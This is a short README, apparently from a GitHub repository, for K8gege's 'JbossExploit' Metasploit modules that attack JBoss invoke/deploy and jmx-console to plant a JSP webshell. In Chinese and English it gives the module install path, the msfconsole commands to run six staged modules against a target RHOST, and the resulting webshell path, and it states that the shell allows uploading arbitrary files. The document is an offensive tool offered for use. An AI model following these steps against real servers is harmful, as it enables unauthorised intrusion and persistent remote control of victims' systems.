JbossExploit
MSF moudle jboss invoke deploy getshell Exploit & Jboss jmx-console getshell exploit
Install / Use
/learn @k8gege/JbossExploitREADME
JbossExploit
MSF jboss invoke deploy EXPLOIT moudle<br>
Date:2013.11.28<br> Author:K8gege<br>
改这个EXP中 过程有点不进人意 没能在一个payload里直接输出小马<br> 无奈只能分成了6步来执行,长度有限制 只能一次写入一段内容。<br> 以追加方式写入 最后才构造出 JSP 小马...<br>
BT5 MSF 下 JBOSS EXP存放路径 把这几个脚本丢到这里来<br> /opt/metasploit/msf3/modules/exploit/multi/http/<br>
msfconsole<br> use exploit/multi/http/jboss_invoke_deploy_K80<br> use exploit/multi/http/jboss_invoke_deploy_K81<br> use exploit/multi/http/jboss_invoke_deploy_K82<br> use exploit/multi/http/jboss_invoke_deploy_K83<br> use exploit/multi/http/jboss_invoke_deploy_K84<br> use exploit/multi/http/jboss_invoke_deploy_K85<br>
set RHOST 172.16.126.134<br> exploit<br>
成功后小马路径为 www.xxoo.com/jboosjdk/inc.jsp<br> 使用K8新型小马客户端连接 可上传任意格式文件<br>
Jboss jmx-console getshell exploit<br><br> <img src=https://github.com/k8gege/JbossExploit/blob/master/jbossJmxexp.PNG><img> <img src=https://github.com/k8gege/JbossExploit/blob/master/k8jbossexp.PNG><img>
